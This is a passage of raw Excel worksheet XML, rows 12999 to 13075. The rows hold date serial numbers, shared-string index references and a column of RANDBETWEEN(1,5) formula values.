    <row r="12999" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12999" s="1">
        <v>43284.202789351853</v>
      </c>
      <c r="C12999" t="s">
        <v>41</v>
      </c>
      <c r="E12999" t="s">
        <v>11651</v>
      </c>
      <c r="F12999">
        <f t="shared" ca="1" si="203"/>
        <v>2</v>
      </c>
    </row>
    <row r="13000" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A13000" s="1">
        <v>43284.177824074075</v>
      </c>
      <c r="C13000" t="s">
        <v>71</v>
      </c>
      <c r="E13000" s="2" t="s">
        <v>11652</v>
      </c>
      <c r="F13000">
        <f t="shared" ca="1" si="203"/>
        <v>4</v>
      </c>
    </row>
    <row r="13001" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A13001" s="1">
        <v>43284.015381944446</v>
      </c>
      <c r="C13001" t="s">
        <v>140</v>
      </c>
      <c r="D13001" t="s">
        <v>234</v>
      </c>
      <c r="E13001" s="2" t="s">
        <v>11653</v>
      </c>
      <c r="F13001">
        <f t="shared" ca="1" si="203"/>
        <v>1</v>
      </c>
    </row>
    <row r="13002" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A13002" s="1">
        <v>43284.001423611109</v>
      </c>
      <c r="C13002" t="s">
        <v>10</v>
      </c>
      <c r="D13002" t="s">
        <v>71</v>
      </c>
      <c r="E13002" s="2" t="s">
        <v>11654</v>
      </c>
      <c r="F13002">
        <f t="shared" ca="1" si="203"/>
        <v>2</v>
      </c>
    </row>
    <row r="13003" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A13003" s="1">
        <v>43283.91065972222</v>
      </c>
      <c r="C13003" t="s">
        <v>140</v>
      </c>
      <c r="D13003" t="s">
        <v>46</v>
      </c>
      <c r="E13003" s="2" t="s">
        <v>11655</v>
      </c>
      <c r="F13003">
        <f t="shared" ca="1" si="203"/>
        <v>1</v>
      </c>
    </row>
    <row r="13004" spans="1:6" ht="240" x14ac:dyDescent="0.25">
      <c r="A13004" s="1">
        <v>43283.879050925927</v>
      </c>
      <c r="C13004" t="s">
        <v>301</v>
      </c>
      <c r="D13004" t="s">
        <v>52</v>
      </c>
      <c r="E13004" s="2" t="s">
        <v>11656</v>
      </c>
      <c r="F13004">
        <f t="shared" ca="1" si="203"/>
        <v>5</v>
      </c>
    </row>
    <row r="13005" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A13005" s="1">
        <v>43283.877650462964</v>
      </c>
      <c r="C13005" t="s">
        <v>2192</v>
      </c>
      <c r="D13005" t="s">
        <v>7</v>
      </c>
      <c r="E13005" s="2" t="s">
        <v>11657</v>
      </c>
      <c r="F13005">
        <f t="shared" ca="1" si="203"/>
        <v>2</v>
      </c>
    </row>
    <row r="13006" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13006" s="1">
        <v>43283.776886574073</v>
      </c>
      <c r="C13006" t="s">
        <v>10</v>
      </c>
      <c r="D13006" t="s">
        <v>251</v>
      </c>
      <c r="E13006" t="s">
        <v>11658</v>
      </c>
      <c r="F13006">
        <f t="shared" ca="1" si="203"/>
        <v>2</v>
      </c>
    </row>
    <row r="13007" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13007" s="1">
        <v>43283.752268518518</v>
      </c>
      <c r="C13007" t="s">
        <v>10</v>
      </c>
      <c r="D13007" t="s">
        <v>6</v>
      </c>
      <c r="E13007" t="s">
        <v>11659</v>
      </c>
      <c r="F13007">
        <f t="shared" ca="1" si="203"/>
        <v>2</v>
      </c>
    </row>
    <row r="13008" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13008" s="1">
        <v>43283.734699074077</v>
      </c>
      <c r="C13008" t="s">
        <v>10</v>
      </c>
      <c r="D13008" t="s">
        <v>993</v>
      </c>
      <c r="E13008" t="s">
        <v>11660</v>
      </c>
      <c r="F13008">
        <f t="shared" ca="1" si="203"/>
        <v>1</v>
      </c>
    </row>
    <row r="13009" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A13009" s="1">
        <v>43283.726655092592</v>
      </c>
      <c r="C13009" t="s">
        <v>10</v>
      </c>
      <c r="D13009" t="s">
        <v>6</v>
      </c>
      <c r="E13009" s="2" t="s">
        <v>11661</v>
      </c>
      <c r="F13009">
        <f t="shared" ca="1" si="203"/>
        <v>5</v>
      </c>
    </row>
    <row r="13010" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A13010" s="1">
        <v>43283.701168981483</v>
      </c>
      <c r="C13010" t="s">
        <v>10</v>
      </c>
      <c r="D13010" t="s">
        <v>20</v>
      </c>
      <c r="E13010" s="2" t="s">
        <v>11662</v>
      </c>
      <c r="F13010">
        <f t="shared" ca="1" si="203"/>
        <v>3</v>
      </c>
    </row>
    <row r="13011" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A13011" s="1">
        <v>43283.655104166668</v>
      </c>
      <c r="C13011" t="s">
        <v>10</v>
      </c>
      <c r="D13011" t="s">
        <v>86</v>
      </c>
      <c r="E13011" s="2" t="s">
        <v>11663</v>
      </c>
      <c r="F13011">
        <f t="shared" ca="1" si="203"/>
        <v>5</v>
      </c>
    </row>
    <row r="13012" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13012" s="1">
        <v>43283.644212962965</v>
      </c>
      <c r="C13012" t="s">
        <v>10</v>
      </c>
      <c r="D13012" t="s">
        <v>71</v>
      </c>
      <c r="E13012" t="s">
        <v>11664</v>
      </c>
      <c r="F13012">
        <f t="shared" ca="1" si="203"/>
        <v>5</v>
      </c>
    </row>
    <row r="13013" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13013" s="1">
        <v>43283.642361111109</v>
      </c>
      <c r="C13013" t="s">
        <v>10</v>
      </c>
      <c r="D13013" t="s">
        <v>107</v>
      </c>
      <c r="E13013" t="s">
        <v>11665</v>
      </c>
      <c r="F13013">
        <f t="shared" ca="1" si="203"/>
        <v>3</v>
      </c>
    </row>
    <row r="13014" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13014" s="1">
        <v>43283.627395833333</v>
      </c>
      <c r="C13014" t="s">
        <v>10</v>
      </c>
      <c r="D13014" t="s">
        <v>158</v>
      </c>
      <c r="E13014" t="s">
        <v>11666</v>
      </c>
      <c r="F13014">
        <f t="shared" ca="1" si="203"/>
        <v>5</v>
      </c>
    </row>
    <row r="13015" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13015" s="1">
        <v>43283.617094907408</v>
      </c>
      <c r="C13015" t="s">
        <v>10</v>
      </c>
      <c r="D13015" t="s">
        <v>80</v>
      </c>
      <c r="E13015" t="s">
        <v>11667</v>
      </c>
      <c r="F13015">
        <f t="shared" ca="1" si="203"/>
        <v>4</v>
      </c>
    </row>
    <row r="13016" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13016" s="1">
        <v>43283.59752314815</v>
      </c>
      <c r="C13016" t="s">
        <v>10</v>
      </c>
      <c r="D13016" t="s">
        <v>23</v>
      </c>
      <c r="E13016" t="s">
        <v>11668</v>
      </c>
      <c r="F13016">
        <f t="shared" ca="1" si="203"/>
        <v>5</v>
      </c>
    </row>
    <row r="13017" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13017" s="1">
        <v>43283.56144675926</v>
      </c>
      <c r="C13017" t="s">
        <v>10</v>
      </c>
      <c r="D13017" t="s">
        <v>52</v>
      </c>
      <c r="E13017" t="s">
        <v>11669</v>
      </c>
      <c r="F13017">
        <f t="shared" ca="1" si="203"/>
        <v>3</v>
      </c>
    </row>
    <row r="13018" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13018" s="1">
        <v>43283.501828703702</v>
      </c>
      <c r="C13018" t="s">
        <v>10</v>
      </c>
      <c r="D13018" t="s">
        <v>46</v>
      </c>
      <c r="E13018" t="s">
        <v>11670</v>
      </c>
      <c r="F13018">
        <f t="shared" ca="1" si="203"/>
        <v>2</v>
      </c>
    </row>
    <row r="13019" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13019" s="1">
        <v>43283.501782407409</v>
      </c>
      <c r="C13019" t="s">
        <v>10</v>
      </c>
      <c r="D13019" t="s">
        <v>112</v>
      </c>
      <c r="E13019" t="s">
        <v>11671</v>
      </c>
      <c r="F13019">
        <f t="shared" ca="1" si="203"/>
        <v>1</v>
      </c>
    </row>
    <row r="13020" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A13020" s="1">
        <v>43283.491655092592</v>
      </c>
      <c r="C13020" t="s">
        <v>3027</v>
      </c>
      <c r="D13020" t="s">
        <v>36</v>
      </c>
      <c r="E13020" s="2" t="s">
        <v>11672</v>
      </c>
      <c r="F13020">
        <f t="shared" ca="1" si="203"/>
        <v>5</v>
      </c>
    </row>
    <row r="13021" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13021" s="1">
        <v>43283.488009259258</v>
      </c>
      <c r="C13021" t="s">
        <v>10</v>
      </c>
      <c r="E13021" t="s">
        <v>11673</v>
      </c>
      <c r="F13021">
        <f t="shared" ca="1" si="203"/>
        <v>2</v>
      </c>
    </row>
    <row r="13022" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13022" s="1">
        <v>43283.476365740738</v>
      </c>
      <c r="C13022" t="s">
        <v>10</v>
      </c>
      <c r="D13022" t="s">
        <v>89</v>
      </c>
      <c r="E13022" t="s">
        <v>11674</v>
      </c>
      <c r="F13022">
        <f t="shared" ca="1" si="203"/>
        <v>3</v>
      </c>
    </row>
    <row r="13023" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13023" s="1">
        <v>43283.450995370367</v>
      </c>
      <c r="C13023" t="s">
        <v>41</v>
      </c>
      <c r="E13023" t="s">
        <v>11675</v>
      </c>
      <c r="F13023">
        <f t="shared" ca="1" si="203"/>
        <v>4</v>
      </c>
    </row>
    <row r="13024" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A13024" s="1">
        <v>43283.444513888891</v>
      </c>
      <c r="C13024" t="s">
        <v>10</v>
      </c>
      <c r="D13024" t="s">
        <v>6</v>
      </c>
      <c r="E13024" s="2" t="s">
        <v>11676</v>
      </c>
      <c r="F13024">
        <f t="shared" ca="1" si="203"/>
        <v>4</v>
      </c>
    </row>
    <row r="13025" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A13025" s="1">
        <v>43283.431064814817</v>
      </c>
      <c r="C13025" t="s">
        <v>10</v>
      </c>
      <c r="D13025" t="s">
        <v>86</v>
      </c>
      <c r="E13025" s="2" t="s">
        <v>11677</v>
      </c>
      <c r="F13025">
        <f t="shared" ca="1" si="203"/>
        <v>1</v>
      </c>
    </row>
    <row r="13026" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A13026" s="1">
        <v>43283.430173611108</v>
      </c>
      <c r="C13026" t="s">
        <v>10</v>
      </c>
      <c r="D13026" t="s">
        <v>86</v>
      </c>
      <c r="E13026" s="2" t="s">
        <v>11678</v>
      </c>
      <c r="F13026">
        <f t="shared" ca="1" si="203"/>
        <v>2</v>
      </c>
    </row>
    <row r="13027" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13027" s="1">
        <v>43283.413726851853</v>
      </c>
      <c r="C13027" t="s">
        <v>10</v>
      </c>
      <c r="E13027" t="s">
        <v>11679</v>
      </c>
      <c r="F13027">
        <f t="shared" ca="1" si="203"/>
        <v>2</v>
      </c>
    </row>
    <row r="13028" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13028" s="1">
        <v>43283.409618055557</v>
      </c>
      <c r="C13028" t="s">
        <v>197</v>
      </c>
      <c r="E13028" t="s">
        <v>11680</v>
      </c>
      <c r="F13028">
        <f t="shared" ca="1" si="203"/>
        <v>2</v>
      </c>
    </row>
    <row r="13029" spans="1:6" ht="240" x14ac:dyDescent="0.25">
      <c r="A13029" s="1">
        <v>43283.406180555554</v>
      </c>
      <c r="C13029" t="s">
        <v>301</v>
      </c>
      <c r="D13029" t="s">
        <v>194</v>
      </c>
      <c r="E13029" s="2" t="s">
        <v>11681</v>
      </c>
      <c r="F13029">
        <f t="shared" ca="1" si="203"/>
        <v>4</v>
      </c>
    </row>
    <row r="13030" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A13030" s="1">
        <v>43283.372858796298</v>
      </c>
      <c r="C13030" t="s">
        <v>140</v>
      </c>
      <c r="D13030" t="s">
        <v>141</v>
      </c>
      <c r="E13030" s="2" t="s">
        <v>11682</v>
      </c>
      <c r="F13030">
        <f t="shared" ca="1" si="203"/>
        <v>2</v>
      </c>
    </row>
    <row r="13031" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A13031" s="1">
        <v>43283.368703703702</v>
      </c>
      <c r="C13031" t="s">
        <v>6</v>
      </c>
      <c r="D13031" t="s">
        <v>25</v>
      </c>
      <c r="E13031" s="2" t="s">
        <v>11683</v>
      </c>
      <c r="F13031">
        <f t="shared" ca="1" si="203"/>
        <v>2</v>
      </c>
    </row>
    <row r="13032" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13032" s="1">
        <v>43283.356828703705</v>
      </c>
      <c r="C13032" t="s">
        <v>430</v>
      </c>
      <c r="E13032" t="s">
        <v>11684</v>
      </c>
      <c r="F13032">
        <f t="shared" ca="1" si="203"/>
        <v>4</v>
      </c>
    </row>
    <row r="13033" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13033" s="1">
        <v>43283.356458333335</v>
      </c>
      <c r="C13033" t="s">
        <v>10</v>
      </c>
      <c r="D13033" t="s">
        <v>92</v>
      </c>
      <c r="E13033" t="s">
        <v>11685</v>
      </c>
      <c r="F13033">
        <f t="shared" ca="1" si="203"/>
        <v>3</v>
      </c>
    </row>
    <row r="13034" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13034" s="1">
        <v>43283.311863425923</v>
      </c>
      <c r="C13034" t="s">
        <v>10</v>
      </c>
      <c r="D13034" t="s">
        <v>36</v>
      </c>
      <c r="E13034" t="s">
        <v>11686</v>
      </c>
      <c r="F13034">
        <f t="shared" ca="1" si="203"/>
        <v>2</v>
      </c>
    </row>
    <row r="13035" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13035" s="1">
        <v>43283.29991898148</v>
      </c>
      <c r="C13035" t="s">
        <v>60</v>
      </c>
      <c r="E13035" t="s">
        <v>11687</v>
      </c>
      <c r="F13035">
        <f t="shared" ca="1" si="203"/>
        <v>4</v>
      </c>
    </row>
    <row r="13036" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13036" s="1">
        <v>43283.256296296298</v>
      </c>
      <c r="C13036" t="s">
        <v>2552</v>
      </c>
      <c r="D13036" t="s">
        <v>1091</v>
      </c>
      <c r="F13036">
        <f t="shared" ca="1" si="203"/>
        <v>5</v>
      </c>
    </row>
    <row r="13037" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13037" s="1">
        <v>43283.237650462965</v>
      </c>
      <c r="C13037" t="s">
        <v>48</v>
      </c>
      <c r="E13037" t="s">
        <v>11688</v>
      </c>
      <c r="F13037">
        <f t="shared" ca="1" si="203"/>
        <v>4</v>
      </c>
    </row>
    <row r="13038" spans="1:6" ht="240" x14ac:dyDescent="0.25">
      <c r="A13038" s="1">
        <v>43283.235949074071</v>
      </c>
      <c r="C13038" t="s">
        <v>5634</v>
      </c>
      <c r="D13038" t="s">
        <v>229</v>
      </c>
      <c r="E13038" s="2" t="s">
        <v>11689</v>
      </c>
      <c r="F13038">
        <f t="shared" ca="1" si="203"/>
        <v>4</v>
      </c>
    </row>
    <row r="13039" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13039" s="1">
        <v>43283.228773148148</v>
      </c>
      <c r="C13039" t="s">
        <v>10</v>
      </c>
      <c r="D13039" t="s">
        <v>89</v>
      </c>
      <c r="F13039">
        <f t="shared" ca="1" si="203"/>
        <v>3</v>
      </c>
    </row>
    <row r="13040" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13040" s="1">
        <v>43283.212777777779</v>
      </c>
      <c r="C13040" t="s">
        <v>48</v>
      </c>
      <c r="E13040" t="s">
        <v>11690</v>
      </c>
      <c r="F13040">
        <f t="shared" ca="1" si="203"/>
        <v>4</v>
      </c>
    </row>
    <row r="13041" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A13041" s="1">
        <v>43283.206412037034</v>
      </c>
      <c r="C13041" t="s">
        <v>71</v>
      </c>
      <c r="D13041" t="s">
        <v>312</v>
      </c>
      <c r="E13041" s="2" t="s">
        <v>11691</v>
      </c>
      <c r="F13041">
        <f t="shared" ca="1" si="203"/>
        <v>2</v>
      </c>
    </row>
    <row r="13042" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13042" s="1">
        <v>43283.181041666663</v>
      </c>
      <c r="C13042" t="s">
        <v>2104</v>
      </c>
      <c r="D13042" t="s">
        <v>107</v>
      </c>
      <c r="E13042" t="s">
        <v>9309</v>
      </c>
      <c r="F13042">
        <f t="shared" ca="1" si="203"/>
        <v>1</v>
      </c>
    </row>
    <row r="13043" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13043" s="1">
        <v>43283.178657407407</v>
      </c>
      <c r="C13043" t="s">
        <v>48</v>
      </c>
      <c r="E13043" t="s">
        <v>11692</v>
      </c>
      <c r="F13043">
        <f t="shared" ca="1" si="203"/>
        <v>4</v>
      </c>
    </row>
    <row r="13044" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A13044" s="1">
        <v>43283.169571759259</v>
      </c>
      <c r="C13044" t="s">
        <v>60</v>
      </c>
      <c r="E13044" s="2" t="s">
        <v>11693</v>
      </c>
      <c r="F13044">
        <f t="shared" ca="1" si="203"/>
        <v>3</v>
      </c>
    </row>
    <row r="13045" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A13045" s="1">
        <v>43283.139722222222</v>
      </c>
      <c r="C13045" t="s">
        <v>318</v>
      </c>
      <c r="E13045" s="2" t="s">
        <v>11694</v>
      </c>
      <c r="F13045">
        <f t="shared" ca="1" si="203"/>
        <v>2</v>
      </c>
    </row>
    <row r="13046" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A13046" s="1">
        <v>43283.127453703702</v>
      </c>
      <c r="C13046" t="s">
        <v>103</v>
      </c>
      <c r="E13046" s="2" t="s">
        <v>11695</v>
      </c>
      <c r="F13046">
        <f t="shared" ca="1" si="203"/>
        <v>5</v>
      </c>
    </row>
    <row r="13047" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13047" s="1">
        <v>43283.104907407411</v>
      </c>
      <c r="C13047" t="s">
        <v>10</v>
      </c>
      <c r="D13047" t="s">
        <v>271</v>
      </c>
      <c r="E13047" t="s">
        <v>11696</v>
      </c>
      <c r="F13047">
        <f t="shared" ca="1" si="203"/>
        <v>4</v>
      </c>
    </row>
    <row r="13048" spans="1:6" ht="240" x14ac:dyDescent="0.25">
      <c r="A13048" s="1">
        <v>43283.104907407411</v>
      </c>
      <c r="C13048" t="s">
        <v>5634</v>
      </c>
      <c r="D13048" t="s">
        <v>36</v>
      </c>
      <c r="E13048" s="2" t="s">
        <v>11697</v>
      </c>
      <c r="F13048">
        <f t="shared" ca="1" si="203"/>
        <v>1</v>
      </c>
    </row>
    <row r="13049" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A13049" s="1">
        <v>43283.047905092593</v>
      </c>
      <c r="C13049" t="s">
        <v>623</v>
      </c>
      <c r="D13049" t="s">
        <v>381</v>
      </c>
      <c r="E13049" s="2" t="s">
        <v>11698</v>
      </c>
      <c r="F13049">
        <f t="shared" ca="1" si="203"/>
        <v>3</v>
      </c>
    </row>
    <row r="13050" spans="1:6" ht="240" x14ac:dyDescent="0.25">
      <c r="A13050" s="1">
        <v>43283.009270833332</v>
      </c>
      <c r="C13050" t="s">
        <v>301</v>
      </c>
      <c r="D13050" t="s">
        <v>71</v>
      </c>
      <c r="E13050" s="2" t="s">
        <v>11699</v>
      </c>
      <c r="F13050">
        <f t="shared" ca="1" si="203"/>
        <v>3</v>
      </c>
    </row>
    <row r="13051" spans="1:6" ht="240" x14ac:dyDescent="0.25">
      <c r="A13051" s="1">
        <v>43282.906585648147</v>
      </c>
      <c r="C13051" t="s">
        <v>301</v>
      </c>
      <c r="D13051" t="s">
        <v>23</v>
      </c>
      <c r="E13051" s="2" t="s">
        <v>11700</v>
      </c>
      <c r="F13051">
        <f t="shared" ca="1" si="203"/>
        <v>4</v>
      </c>
    </row>
    <row r="13052" spans="1:6" ht="345" x14ac:dyDescent="0.25">
      <c r="A13052" s="1">
        <v>43282.888831018521</v>
      </c>
      <c r="C13052" t="s">
        <v>280</v>
      </c>
      <c r="D13052" t="s">
        <v>1091</v>
      </c>
      <c r="E13052" s="2" t="s">
        <v>11701</v>
      </c>
      <c r="F13052">
        <f t="shared" ca="1" si="203"/>
        <v>4</v>
      </c>
    </row>
    <row r="13053" spans="1:6" ht="240" x14ac:dyDescent="0.25">
      <c r="A13053" s="1">
        <v>43282.698113425926</v>
      </c>
      <c r="C13053" t="s">
        <v>301</v>
      </c>
      <c r="D13053" t="s">
        <v>222</v>
      </c>
      <c r="E13053" s="2" t="s">
        <v>11702</v>
      </c>
      <c r="F13053">
        <f t="shared" ca="1" si="203"/>
        <v>1</v>
      </c>
    </row>
    <row r="13054" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13054" s="1">
        <v>43282.633657407408</v>
      </c>
      <c r="C13054" t="s">
        <v>41</v>
      </c>
      <c r="E13054" t="s">
        <v>11703</v>
      </c>
      <c r="F13054">
        <f t="shared" ca="1" si="203"/>
        <v>4</v>
      </c>
    </row>
    <row r="13055" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A13055" s="1">
        <v>43282.589247685188</v>
      </c>
      <c r="C13055" t="s">
        <v>8872</v>
      </c>
      <c r="D13055" t="s">
        <v>112</v>
      </c>
      <c r="E13055" s="2" t="s">
        <v>11704</v>
      </c>
      <c r="F13055">
        <f t="shared" ca="1" si="203"/>
        <v>1</v>
      </c>
    </row>
    <row r="13056" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13056" s="1">
        <v>43282.52884259259</v>
      </c>
      <c r="C13056" t="s">
        <v>454</v>
      </c>
      <c r="D13056" t="s">
        <v>33</v>
      </c>
      <c r="E13056" t="s">
        <v>9921</v>
      </c>
      <c r="F13056">
        <f t="shared" ca="1" si="203"/>
        <v>3</v>
      </c>
    </row>
    <row r="13057" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13057" s="1">
        <v>43282.528726851851</v>
      </c>
      <c r="C13057" t="s">
        <v>454</v>
      </c>
      <c r="D13057" t="s">
        <v>1160</v>
      </c>
      <c r="E13057" t="s">
        <v>9921</v>
      </c>
      <c r="F13057">
        <f t="shared" ca="1" si="203"/>
        <v>5</v>
      </c>
    </row>
    <row r="13058" spans="1:6" ht="240" x14ac:dyDescent="0.25">
      <c r="A13058" s="1">
        <v>43282.512824074074</v>
      </c>
      <c r="C13058" t="s">
        <v>301</v>
      </c>
      <c r="D13058" t="s">
        <v>41</v>
      </c>
      <c r="E13058" s="2" t="s">
        <v>11705</v>
      </c>
      <c r="F13058">
        <f t="shared" ref="F13058:F13121" ca="1" si="204">RANDBETWEEN(1,5)</f>
        <v>2</v>
      </c>
    </row>
    <row r="13059" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A13059" s="1">
        <v>43282.502858796295</v>
      </c>
      <c r="C13059" t="s">
        <v>2192</v>
      </c>
      <c r="D13059" t="s">
        <v>7</v>
      </c>
      <c r="E13059" s="2" t="s">
        <v>11706</v>
      </c>
      <c r="F13059">
        <f t="shared" ca="1" si="204"/>
        <v>2</v>
      </c>
    </row>
    <row r="13060" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13060" s="1">
        <v>43282.492824074077</v>
      </c>
      <c r="C13060" t="s">
        <v>10</v>
      </c>
      <c r="D13060" t="s">
        <v>36</v>
      </c>
      <c r="E13060" t="s">
        <v>11707</v>
      </c>
      <c r="F13060">
        <f t="shared" ca="1" si="204"/>
        <v>4</v>
      </c>
    </row>
    <row r="13061" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A13061" s="1">
        <v>43282.469027777777</v>
      </c>
      <c r="C13061" t="s">
        <v>2192</v>
      </c>
      <c r="D13061" t="s">
        <v>7</v>
      </c>
      <c r="E13061" s="2" t="s">
        <v>11708</v>
      </c>
      <c r="F13061">
        <f t="shared" ca="1" si="204"/>
        <v>4</v>
      </c>
    </row>
    <row r="13062" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A13062" s="1">
        <v>43282.468518518515</v>
      </c>
      <c r="C13062" t="s">
        <v>720</v>
      </c>
      <c r="D13062" t="s">
        <v>885</v>
      </c>
      <c r="E13062" s="2" t="s">
        <v>11709</v>
      </c>
      <c r="F13062">
        <f t="shared" ca="1" si="204"/>
        <v>2</v>
      </c>
    </row>
    <row r="13063" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A13063" s="1">
        <v>43282.462789351855</v>
      </c>
      <c r="C13063" t="s">
        <v>3027</v>
      </c>
      <c r="D13063" t="s">
        <v>374</v>
      </c>
      <c r="E13063" s="2" t="s">
        <v>11710</v>
      </c>
      <c r="F13063">
        <f t="shared" ca="1" si="204"/>
        <v>4</v>
      </c>
    </row>
    <row r="13064" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A13064" s="1">
        <v>43282.460324074076</v>
      </c>
      <c r="C13064" t="s">
        <v>1408</v>
      </c>
      <c r="D13064" t="s">
        <v>721</v>
      </c>
      <c r="E13064" s="2" t="s">
        <v>11711</v>
      </c>
      <c r="F13064">
        <f t="shared" ca="1" si="204"/>
        <v>3</v>
      </c>
    </row>
    <row r="13065" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13065" s="1">
        <v>43282.422164351854</v>
      </c>
      <c r="C13065" t="s">
        <v>10</v>
      </c>
      <c r="D13065" t="s">
        <v>271</v>
      </c>
      <c r="E13065" t="s">
        <v>11712</v>
      </c>
      <c r="F13065">
        <f t="shared" ca="1" si="204"/>
        <v>2</v>
      </c>
    </row>
    <row r="13066" spans="1:6" ht="240" x14ac:dyDescent="0.25">
      <c r="A13066" s="1">
        <v>43282.371967592589</v>
      </c>
      <c r="C13066" t="s">
        <v>197</v>
      </c>
      <c r="E13066" s="2" t="s">
        <v>11713</v>
      </c>
      <c r="F13066">
        <f t="shared" ca="1" si="204"/>
        <v>2</v>
      </c>
    </row>
    <row r="13067" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13067" s="1">
        <v>43282.322662037041</v>
      </c>
      <c r="C13067" t="s">
        <v>6</v>
      </c>
      <c r="D13067" t="s">
        <v>821</v>
      </c>
      <c r="E13067" t="s">
        <v>11714</v>
      </c>
      <c r="F13067">
        <f t="shared" ca="1" si="204"/>
        <v>4</v>
      </c>
    </row>
    <row r="13068" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13068" s="1">
        <v>43282.246018518519</v>
      </c>
      <c r="C13068" t="s">
        <v>3027</v>
      </c>
      <c r="D13068" t="s">
        <v>39</v>
      </c>
      <c r="E13068" t="s">
        <v>8504</v>
      </c>
      <c r="F13068">
        <f t="shared" ca="1" si="204"/>
        <v>5</v>
      </c>
    </row>
    <row r="13069" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13069" s="1">
        <v>43282.222233796296</v>
      </c>
      <c r="C13069" t="s">
        <v>63</v>
      </c>
      <c r="E13069" t="s">
        <v>11715</v>
      </c>
      <c r="F13069">
        <f t="shared" ca="1" si="204"/>
        <v>2</v>
      </c>
    </row>
    <row r="13070" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A13070" s="1">
        <v>43282.054386574076</v>
      </c>
      <c r="C13070" t="s">
        <v>41</v>
      </c>
      <c r="D13070" t="s">
        <v>312</v>
      </c>
      <c r="E13070" s="2" t="s">
        <v>11716</v>
      </c>
      <c r="F13070">
        <f t="shared" ca="1" si="204"/>
        <v>1</v>
      </c>
    </row>
    <row r="13071" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13071" s="1">
        <v>43282.049756944441</v>
      </c>
      <c r="C13071" t="s">
        <v>253</v>
      </c>
      <c r="E13071" t="s">
        <v>4528</v>
      </c>
      <c r="F13071">
        <f t="shared" ca="1" si="204"/>
        <v>1</v>
      </c>
    </row>
    <row r="13072" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A13072" s="1">
        <v>43281.906782407408</v>
      </c>
      <c r="C13072" t="s">
        <v>65</v>
      </c>
      <c r="D13072" t="s">
        <v>36</v>
      </c>
      <c r="E13072" s="2" t="s">
        <v>11717</v>
      </c>
      <c r="F13072">
        <f t="shared" ca="1" si="204"/>
        <v>4</v>
      </c>
    </row>
    <row r="13073" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13073" s="1">
        <v>43281.900324074071</v>
      </c>
      <c r="C13073" t="s">
        <v>10</v>
      </c>
      <c r="D13073" t="s">
        <v>107</v>
      </c>
      <c r="E13073" t="s">
        <v>11718</v>
      </c>
      <c r="F13073">
        <f t="shared" ca="1" si="204"/>
        <v>5</v>
      </c>
    </row>
    <row r="13074" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A13074" s="1">
        <v>43281.786620370367</v>
      </c>
      <c r="C13074" t="s">
        <v>65</v>
      </c>
      <c r="D13074" t="s">
        <v>336</v>
      </c>
      <c r="E13074" s="2" t="s">
        <v>11719</v>
      </c>
      <c r="F13074">
        <f t="shared" ca="1" si="204"/>
        <v>2</v>
      </c>
    </row>
    <row r="13075" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13075" s="1">
